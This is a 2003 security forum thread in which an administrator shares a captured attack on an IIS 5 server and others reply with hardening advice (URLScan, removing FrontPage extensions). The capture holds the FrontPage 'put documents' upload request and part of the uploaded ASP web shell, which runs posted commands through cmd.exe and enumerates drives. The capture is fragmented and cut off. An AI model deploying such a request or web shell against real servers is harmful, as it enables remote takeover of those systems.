New vulnerability???

[Steve at USF]

List below was used against a web server running IIS 5
with all patches last night. I can't find anything related
to this one. I believe this could be a new one but can't
find where to submit this to Microsoft.

POST /_vti_bin/shtml.dll/_vti_rpc HTTP/1.1
Date: Mon, 07 Jul 2003 13:32:20 GMT
MIME-Version: 1.0
User-Agent: MSFrontPage/5.0
Host: 131.247.160.22
Accept: auth/sicily
Content-Length: 41
Content-Type: application/x-www-form-urlencoded
X-Vermeer-Content-Type: application/x-www-form-urlencoded
Connection: Keep-Alive
Cache-Control: no-cache
method=server+version%3a5%2e0%2e2%2e4128
P)!(
--MIMEboundary-07 Jul 2003 13:32:57 -0000-
ZWGEROJCKIDCVBTCGO
Content-Type: application/x-www-form-urlencoded
method=put+documents%3a4%2e0%2e2%2e7802&service%
5fname=&put%
5foption=overwrite&listFiles=true&listLinkInfo=true
--MIMEboundary-07 Jul 2003 13:32:57 -0000-
ZWGEROJCKIDCVBTCGO
Content-Type: application/x-www-form-urlencoded
document=%5bdocument%5fname%3d%5fprivate%2fgo%2easp%3bmeta%
5finfo%3d%5bvti%
5fmodifiedby%3bSW%7cAdministrateur%3bmf%2dfile%2dstatus%
3bIX%7c0%3bvti%5ftim
elastmodified%3bTW%7c14+Oct+2003+11%3a13%3a08+%2d0000%
3bvti%5fauthor%3bSW%
7cAdministrateur%5d%5d
--MIMEboundary-07 Jul 2003 13:32:57 -0000-
ZWGEROJCKIDCVBTCGO
Content-Type: application/octet-stream
<%@ Language=VBScript %>
Dim oScript
Dim oScriptNet
Dim oFileSys, oFile
Dim szCMD, szTempFile
On Error Resume Next
\' -- create the COM objects that we will be using -- \'
Set oScript = Server.CreateObject(\"WSCRIPT.SHELL\")
Set oScriptNet = Server.CreateObject(\"WSCRIPT.NETWORK\")
Set oFileSys = Server.CreateObject
(\"Scripting.FileSystemObject\")
\' -- check for a command that we have posted -- \'
szCMD = Request.Form(\".CMD\")
If (szCMD <> \"\") Then
\' -- Use a poor man\'s pipe ... a temp file -- \'
szTempFile = \"C:\\\" & oFileSys.GetTempName( )
Call oScript.Run (\"cmd.exe /c \" & szCMD & \" > \" &
szTempFile, 0, True)
Set oFile
P)!3
@@5-
onse.Write \"<tr><td nowrap><font
face=arial><b>Driveletter</td><td
nowrap><font face=arial><b>Drive Type</td><td nowrap><font
face=arial><b>Volume Name
</td><td nowrap><font face=arial><b>Total Space</td><td
nowrap><font
face=arial><b>Available Space</td><td nowrap><font
face=arial><b>File
System</td><
td nowrap><font face=arial><b>Serial #</td></tr>\"
Set fs = CreateObject(\"Scripting.FileSystemObject\")
Set drv = fs.Drives
For each d in drv
If d.Driveletter <> \"A\" Then
If d.IsReady = True Then
freespace = (d.AvailableSpace / 1024)
free = (freespace / 1024)
totalspace = (d.TotalSize / 1024)
total = (totalspace / 1024)
Response.Write \"<tr><td nowrap><font face=arial
size=2><A
href=\'dirwalkR.asp?id=\"& d.DriveLetter &\"\'>\"&
d.DriveLetter &\"</a></td>\"
If d.DriveType = 3 Then
dtype = \"Network\"
If d.ShareName = \"\" Then
dname = \"&nbsp;\"
Else
dname = d.ShareName
End If
ElseIf d.DriveType = 0 Then
dtype = \"Unknown\"
If d.VolumeName = \"\" Then
dname = \"&nbsp;\"
Else
dname = d.VolumeName
End If
ElseIf d.DriveType = 1 Then
dtype = \"Removeable\"
If d.VolumeName = \"\" Then
dname = \"&nbsp;\"
Else
dname = d.VolumeName
End If
ElseIf d.DriveType = 2 Then
dtype = \"Fixed\"
If d.VolumeName = \"\" Then
dname = \"&nbsp;\"
Else
dname = d.VolumeName
End If
ElseIf d.DriveType = 4 Then
dtype =

 

[tzone]

I beleive URLSCAN would stop this and get rid of MS Server
Extentions and start using ASP or PHP.

 

[Karl Levinson [x y] mvp]

Agreed. Not sure this is anything new. Note that "all patches installed"
does not mean security. There are other things necessary, such as hardening
checklists to choose more secure settings. Fully patched servers can be
hacked if they have the default settings and files left enabled. Here's a
pointer to some hardening checklists:

http://securityadmin.info/faq.htm#harden
http://securityadmin.info/faq.htm#re-secure
http://securityadmin.info/faq.htm#hacked